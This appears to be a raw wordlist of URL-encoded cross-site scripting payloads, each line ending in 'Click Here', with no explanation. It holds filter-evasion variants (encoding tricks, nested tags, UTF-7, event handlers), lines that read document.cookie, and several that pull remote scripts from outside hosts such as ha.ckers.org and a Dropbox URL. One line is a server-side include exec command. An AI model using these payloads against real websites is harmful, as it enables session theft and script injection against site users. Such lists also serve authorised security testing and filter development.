%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3aalert('XSS')%22)%7d%3c%2fSTYLE%3eClick Here

%3cXSS%20STYLE%3d%22behavior%3a%20url(xss%2ehtc)%3b%22%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(alert('XSS'))%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3aalert('XSS')%3b%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3ddata%3atext%2fhtml%20base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3aalert('XSS')%3b%22%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3eClick Here

%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fFRAMESET%3eClick Here

%3cTABLE%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cTABLE%3e%3cTD%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(javascript%3aalert('XSS'))%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%5c0075%5c0072%5c006C%5c0028'%5c006a%5c0061%5c0076%5c0061%5c0073%5c0063%5c0072%5c0069%5c0070%5c0074%5c003a%5c0061%5c006c%5c0065%5c0072%5c0074%5c0028%2e1027%5c0058%2e1053%5c0053%5c0027%5c0029'%5c0029%22%3eClick Here

%3cDIV%20STYLE%3d%22width%3a%20expression(alert('XSS'))%3b%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(%26%231%3bjavascript%3aalert('XSS'))%22%3eClick Here

%3c!--[if%20gte%20IE%204]%3e%3cSCRIPT%3ealert('XSS')%3b%3c%2fSCRIPT%3e%3c![endif]--%3eClick Here

%3cBASE%20HREF%3d%22javascript%3aalert('XSS')%3b%2f%2f%22%3eClick Here

%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22http%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%22%3e%3c%2fOBJECT%3eClick Here

%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'%3cSCR'%22--%3e%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'IPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3c%2fSCRIPT%3e'%22--%3eClick Here

%3cIMG%20SRC%3d%22http%3a%2f%2fwww%2ethesiteyouareon%2ecom%2fsomecommand%2ephp%3fsomevariables%3dmaliciouscode%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22Set-Cookie%22%20Content%3d%22USERID%3d%3cSCRIPT%3ealert('XSS')%3c%2fSCRIPT%3e%22%3eClick Here

%3c%3f%20echo('%3cSCR)'%3becho('IPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e')%3b%20%3f%3eClick Here

%3cHEAD%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-alert('XSS')%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%3cSCRIPT%20a%3d%22%3e%22%20''%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20%22a%3d'%3e'%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%3edocument%2ewrite(%22%3cSCRI%22)%3b%3c%2fSCRIPT%3ePT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%60%3e%60%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e'%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f66%2e102%2e7%2e147%2f%22%3eXSS%3c%2fA%3eClick Here

0%5c%22autofocus%2fonfocus%3dalert(1)--%3e%3cvideo%2fposter%2f%20error%3dprompt(2)%3e%22-confirm(3)-%22Click Here

%23%22%3e%3cimg%20src%3dM%20onerror%3dalert('XSS')%3b%3eClick Here

veris--%3egroup%3csvg%2fonload%3dalert(%2fXSS%2f)%2f%2fClick Here

element[attribute%3d'%3cimg%20src%3dx%20onerror%3dalert('XSS')%3b%3eClick Here

[%3cblockquote%20cite%3d%22]%22%3e[%22%20onmouseover%3d%22alert('RVRSH3LL_XSS')%3b%22%20]Click Here

%22%3balert%28%27RVRSH3LL_XSS%29%2f%2fClick Here

javascript%3aalert%281%29%3bClick Here

%3cw%20contenteditable%20id%3dx%20onfocus%3dalert()%3eClick Here

alert%3bpg(%22XSS%22)Click Here

%3cscript%3efor((i)in(self))eval(i)(1)%3c%2fscript%3eClick Here

%3csvg%2fonload%3d%26%23097lert%26lpar%3b1337)%3eClick Here

%3cscr%3cscript%3eipt%3ealert(1)%3c%2fscr%3c%2fscript%3eipt%3e%3cscr%3cscript%3eipt%3ealert(1)%3c%2fscr%3c%2fscript%3eipt%3eClick Here

%3csCR%3cscript%3eiPt%3ealert(1)%3c%2fSCr%3c%2fscript%3eIPt%3eClick Here

%3ca%20href%3d%22data%3atext%2fhtml%3bbase64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4%3d%22%3etest%3c%2fa%3eClick Here

%253Cscript%253Ealert('XSS')%253C%252Fscript%253EClick Here

%3cIMG%20SRC%3dx%20onload%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onbeforeprint%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onafterprint%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onbeforeunload%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onhashchange%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onerror%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onload%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onmessage%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ononline%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onoffline%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onpagehide%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onpopstate%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onpageshow%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onresize%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onstorage%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onunload%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onchange%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onblur%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oncontextmenu%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oninput%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oninvalid%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onselect%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onsearch%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onreset%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onsubmit%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onkeydown%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onkeypress%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onkeyup%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onclick%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondblclick%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onmousedown%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onmouseout%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onmousemove%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onmouseover%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onmouseup%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onmousewheel%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onwheel%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondragend%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondrag%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondragenter%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondragover%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondragstart%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondrop%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondragleave%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onscroll%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oncopy%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oncut%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onpaste%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onabort%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oncanplay%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oncuechange%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20oncanplaythrough%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ondurationchange%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onemptied%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onerror%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onended%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onloadeddata%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onloadedmetadata%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onplay%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onpause%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onplaying%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onloadstart%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onprogress%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onseeked%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onseeking%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onratechange%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onstalled%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onsuspend%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ontimeupdate%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onvolumechange%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onwaiting%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onshow%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20ontoggle%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cIMG%20SRC%3dx%20onload%3d%22alert(String%2efromCharCode(88,83,83))%22%3eClick Here

%3cINPUT%20TYPE%3d%22BUTTON%22%20action%3d%22alert('XSS')%22%2f%3eClick Here

%3cMETA%20onpaonpageonpagonpageonpageshowshoweshowshowgeshow%3d%22alert(1)%22%3bClick Here

%22%3e%3ch1%3e%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3e%22%3e123%3c%2fh1%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3eClick Here

%22%3e%3ch1%3e%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3e123%3c%2fh1%3eClick Here

%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3eClick Here

%22%3e%3ch1%3e%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3e123%3c%2fh1%3eClick Here

%22%3e%3c%2fiframe%3e%3cscript%3ealert(%60TEXT%20YOU%20WANT%20TO%20BE%20DISPLAYED%60)%3b%3c%2fscript%3e%3ciframe%20frameborder%3d%220%EF%BB%BFClick Here

%3e%3ch1%3e%3cIFRAME%20width%3d%22420%22%20height%3d%22315%22%20frameborder%3d%220%22%20onmouseover%3d%22document%2elocation%2ehref%3d'https%3a%2f%2fwww%2eyoutube%2ecom%2fchannel%2fUC9Qa_gXarSmObPX3ooIQZrClick Here

%22%3e%3ch1%3e%3ciframe%20width%3d%22420%22%20height%3d%22315%22%20src%3d%22http%3a%2f%2fwww%2eyoutube%2ecom%2fembed%2fsxvccpasgTE%22%20frameborder%3d%220%22%20allowfullscreen%3e%3c%2fiframe%3e123%3c%2fh1%3eClick Here

%22%3e%3ch1%3e%3cIFRAME%20width%3d%22420%22%20height%3d%22315%22%20SRC%3d%22http%3a%2f%2fwww%2eyoutube%2ecom%2fembed%2fsxvccpasgTE%22%20frameborder%3d%220%22%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3e123%3c%2fh1%3eClick Here

%3cIFRAME%20width%3d%22420%22%20height%3d%22315%22%20frameborder%3d%220%22%20onload%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3eClick Here

g'%22%3e%3c%2fIFRAME%3eHover%20the%20cursor%20to%20the%20LEFT%20of%20this%20Message%3c%2fh1%3e%26ParamHeight%3d250Click Here

%22%3e%3ch1%3e%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3e123%3c%2fh1%3eClick Here

%3ciframe%20src%3dhttp%3a%2f%2fxss%2erocks%2fscriptlet%2ehtml%20%3cClick Here

%22%3e%3ch1%3e%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3e%22%3e123%3c%2fh1%3eClick Here

%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3eClick Here

%3ciframe%20%20src%3d%22%26Tab%3bjavascript%3aprompt(1)%26Tab%3b%22%3eClick Here

%3cinput%2fonmouseover%3d%22javaSCRIPT%26colon%3bconfirm%26lpar%3b1%26rpar%3b%22Click Here

%3csvg%3e%3cstyle%3e%7bfont-family%26colon%3b'%3ciframe%2fonload%3dconfirm(1)%3e'Click Here

%3csVg%3e%3cscRipt%20%3ealert%26lpar%3b1%26rpar%3b%20%7bOpera%7dClick Here

%3cimg%2fsrc%3d%60%60%20onerror%3dthis%2eonerror%3dconfirm(1)%20Click Here

%3cform%3e%3cisindex%20formaction%3d%22javascript%26colon%3bconfirm(1)%22Click Here

%3cimg%20src%3d%60%60%26NewLine%3b%20onerror%3dalert(1)%26NewLine%3bClick Here

%3cscript%2f%26Tab%3b%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%2f%26Tab%3b%3e%3c%2fscript%3eClick Here

%3cScRipT%205-0%2a3%2b9%2f3%3d%3eprompt(1)%3c%2fScRipT%20giveanswerhere%3d%3fClick Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d%22%3eClick Here

%26%2334%3b%26%2362%3b%3ch1%2fonmouseover%3d'%5cu0061lert(1)'%3eClick Here

%3cscript%20%2f%2a%2a%2f%3e%2f%2a%2a%2falert(1)%2f%2a%2a%2f%3c%2fscript%20%2f%2a%2a%2fClick Here

%3cmeta%20content%3d%22%26NewLine%3b%201%20%26NewLine%3b%3b%20JAVASCRIPT%26colon%3b%20alert(1)%22%20http-equiv%3d%22refresh%22%2f%3eClick Here

%3csvg%3e%3cscript%20xlink%3ahref%3ddata%26colon%3b,window%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%20%3c%2fscriptClick Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml,%3csvg%20%26%23111%3b%26%23110%3bload%3dalert(1)%3e%22%3eClick Here

%3csvg%3e%3cscript%20x%3ahref%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%7bOpera%7dClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3burl%3djavascript%3aconfirm(1)%22%3eClick Here

%3ciframe%20src%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3blocation%26rpar%3b%3eClick Here

%3cform%3e%3ca%20href%3d%22javascript%3a%5cu0061lert%26%23x28%3b1%26%23x29%3b%22%3eX%3c%2fscript%3e%3cimg%2f%2a%2fsrc%3d%22worksinchrome%26colon%3bprompt%26%23x28%3b1%26%23x29%3b%22%2f%2a%2fonerror%3d'eval(src)'%3eClick Here

%3ca%20href%3d%22data%3aapplication%2fx-x509-user-cert%3b%26NewLine%3bbase64%26NewLine%3b,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3d%3d%22%26%2309%3b%26%2310%3b%26%2311%3b%3eX%3c%2faClick Here

%3cimg%2f%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%60~%60%20onerror%3dprompt(1)%3eClick Here

%3cform%3e%3ciframe%20%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%22javascript%26%2358%3balert(1)%22%26%2311%3b%26%2310%3b%26%2309%3b%3b%3eClick Here

http%3a%2f%2fwww%2egoogle%3cscript%20%2ecom%3ealert(document%2elocation)%3c%2fscriptClick Here

%3ca%26%2332%3bhref%26%2361%3b%26%2391%3b%26%2300%3b%26%2393%3b%22%26%2300%3b%20onmouseover%3dprompt%26%2340%3b1%26%2341%3b%26%2347%3b%26%2347%3b%22%3eXYZ%3c%2faClick Here

%3cstyle%2fonload%3dprompt%26%2340%3b'%26%2388%3b%26%2383%3b%26%2383%3b'%26%2341%3bClick Here

%3cimg%2fsrc%3d@%26%2332%3b%26%2313%3b%20onerror%20%3d%20prompt('%26%2349%3b')Click Here

%3cscript%20%5e__%5e%3ealert(String%2efromCharCode(49))%3c%2fscript%20%5e__%5eClick Here

%26%2300%3b%3c%2fform%3e%3cinput%20type%26%2361%3b%22date%22%20onfocus%3d%22alert(1)%22%3eClick Here

%3c%2fstyle%20%26%2332%3b%3e%3cscript%20%26%2332%3b%20%3a-(%3e%2f%2a%2a%2falert(document%2elocation)%2f%2a%2a%2f%3c%2fscript%20%26%2332%3b%20%3a-(Click Here

%3cform%3e%3ctextarea%20%26%2313%3b%20onkeyup%3d'%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074%26%23x28%3b1%26%23x29%3b'%3eClick Here

%3cscript%20%2f%2a%2a%2a%2f%3e%2f%2a%2a%2a%2fconfirm('%5cuFF41%5cuFF4C%5cuFF45%5cuFF52%5cuFF54%5cu1455%5cuFF11%5cu1450')%2f%2a%2a%2a%2f%3c%2fscript%20%2f%2a%2a%2a%2fClick Here

%3ciframe%20srcdoc%3d'%26lt%3bbody%20onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'%3eClick Here

%3cscript%20~~~%3ealert(0%0)%3c%2fscript%20~~~%3eClick Here

%3ca%20href%3d%22javascript%3avoid(0)%22%20onmouseover%3d%26NewLine%3bjavascript%3aalert(1)%26NewLine%3b%3eX%3c%2fa%3eClick Here

%3cstyle%2fonload%3d%26lt%3b!--%26%2309%3b%26gt%3b%26%2310%3balert%26%2310%3b%26lpar%3b1%26rpar%3b%3eClick Here

%3cimg%2fsrc%3d'http%3a%2f%2fi%2eimgur%2ecom%2fP8mL8%2ejpg'%20onmouseover%3d%26Tab%3bprompt(1)Click Here

%3c%2f%2f%2fstyle%2f%2f%2f%3e%3cspan%20%2F%20onmousemove%3d'alert%26lpar%3b1%26rpar%3b'%3eSPANClick Here

%26%2334%3b%26%2362%3b%3csvg%3e%3cstyle%3e%7b-o-link-source%26colon%3b'%3cbody%2fonload%3dconfirm(1)%3e'Click Here

%26%2313%3b%3cblink%2f%26%2313%3b%20onmouseover%3dpr%26%23x6F%3bmp%26%23116%3b(1)%3eOnMouseOver%20%7bFirefox%20%26%20Opera%7dClick Here

%3cmarquee%20onstart%3d'javascript%3aalert%26%23x28%3b1%26%23x29%3b'%3e%5e__%5eClick Here

%3cdiv%2fstyle%3d%22width%3aexpression(confirm(1))%22%3eX%3c%2fdiv%3e%20%7bIE7%7dClick Here

%3ciframe%2f%2f%20src%3djavaSCRIPT%26colon%3balert(1)Click Here

%2f%2f%3cform%2faction%3djavascript%26%23x3A%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3e%3cinput%2ftype%3d'submit'%3e%2f%2fClick Here

%2f%2aiframe%2fsrc%2a%2f%3ciframe%2fsrc%3d%22%3ciframe%2fsrc%3d@%22%2fonload%3dprompt(1)%20%2f%2aiframe%2fsrc%2a%2f%3eClick Here

%3ca%2fhref%3d%22javascript%3a%26%2313%3b%20javascript%3aprompt(1)%22%3e%3cinput%20type%3d%22X%22%3eClick Here

%2f%2f%7c%5c%5c%20%3cscript%20%2f%2f%7c%5c%5c%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%3e%20%2f%2f%7c%5c%5c%20%3c%2fscript%20%2f%2f%7c%5c%5cClick Here

%3c%2fplaintext%5c%3e%3c%2f%7c%5c%3e%3cplaintext%2fonmouseover%3dprompt(1)Click Here

%3c%2fsvg%3e''%3csvg%3e%3cscript%20'AQuickBrownFoxJumpsOverTheLazyDog'%3ealert%26%23x28%3b1%26%23x29%3b%20%7bOpera%7dClick Here

%3c%2ffont%3e%2f%3csvg%3e%3cstyle%3e%7bsrc%26%23x3A%3b'%3cstyle%2fonload%3dthis%2eonload%3dconfirm(1)%3e'%3c%2ffont%3e%2f%3c%2fstyle%3eClick Here

%3ca%20href%3d%22javascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t%26lpar%3b1%26rpar%3b%22%3e%3cbutton%3eClick Here

%3cdiv%20onmouseover%3d'alert%26lpar%3b1%26rpar%3b'%3eDIV%3c%2fdiv%3eClick Here

%3ciframe%20style%3d%22position%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%3eClick Here

%3ca%20href%3d%22jAvAsCrIpT%26colon%3balert%26lpar%3b1%26rpar%3b%22%3eX%3c%2fa%3eClick Here

%3cembed%20src%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3cvar%20onmouseover%3d%22prompt(1)%22%3eOn%20Mouse%20Over%3c%2fvar%3eClick Here

%3cobject%20data%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3ca%20href%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3eClick%20Here%3c%2fa%3eClick Here

%3c%%3c!--'%%3e%3cscript%3ealert(1)%3b%3c%2fscript%20--%3eClick Here

%3cscript%20src%3d%22data%3atext%2fjavascript,alert(1)%22%3e%3c%2fscript%3eClick Here

%3cimg%20src%3d%22%2f%22%20%3d_%3d%22%20title%3d%22onerror%3d'prompt(1)'%22%3eClick Here

%3ciframe%2fsrc%20%5c%2f%5c%2fonload%20%3d%20prompt(1)Click Here

%3csvg%2fonload%3dalert(1)Click Here

%3cinput%20value%3d%3c%3e%3ciframe%2fsrc%3djavascript%3aconfirm(1)Click Here

%3ciframe%2fonreadystatechange%3dalert(1)Click Here

%3cinput%20type%3d%22text%22%20value%3d%60%60%20%3cdiv%2fonmouseover%3d'alert(1)'%3eX%3c%2fdiv%3eClick Here

http%3a%2f%2fwww%2e%3cscript%3ealert(1)%3c%2fscript%20%2ecomClick Here

%3csvg%3e%3cscript%20%3f%3ealert(1)Click Here

%3ciframe%20src%3dj%26Tab%3ba%26Tab%3bv%26Tab%3ba%26Tab%3bs%26Tab%3bc%26Tab%3br%26Tab%3bi%26Tab%3bp%26Tab%3bt%26Tab%3b%3aa%26Tab%3bl%26Tab%3be%26Tab%3br%26Tab%3bt%26Tab%3b%28%26Tab%3b1%26Tab%3b%29%3e%3c%2fiframe%3eClick Here

%3cimg%20src%3d%60xx%3axx%60onerror%3dalert(1)%3eClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3bjavascript%26colon%3balert(1)%22%2f%3eClick Here

%3cobject%20type%3d%22text%2fx-scriptlet%22%20data%3d%22http%3a%2f%2fjsfiddle%2enet%2fXLE63%2f%20%22%3e%3c%2fobject%3eClick Here

%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3cembed%20code%3d%22http%3a%2f%2fbusinessinfo%2eco%2euk%2flabs%2fxss%2fxss%2eswf%22%20allowscriptaccess%3dalways%3eClick Here

%3csvg%20contentScriptType%3dtext%2fvbs%3e%3cscript%3eMsgBox%2b1Click Here

%3ciframe%2fonreadystatechange%3d%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074('%5cu0061')%20worksinIE%3eClick Here

%3ca%20href%3d%22data%3atext%2fhtml%3bbase64_,%3csvg%2fonload%3d%5cu0061%26%23x6C%3b%26%23101%72t(1)%3e%22%3eX%3c%2faClick Here

%3cscript%3e~'%5cu0061'%20%3b%20%5cu0074%5cu0068%5cu0072%5cu006F%5cu0077%20~%20%5cu0074%5cu0068%5cu0069%5cu0073%2e%20%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074(~'%5cu0061')%3c%2fscript%20U%2bClick Here

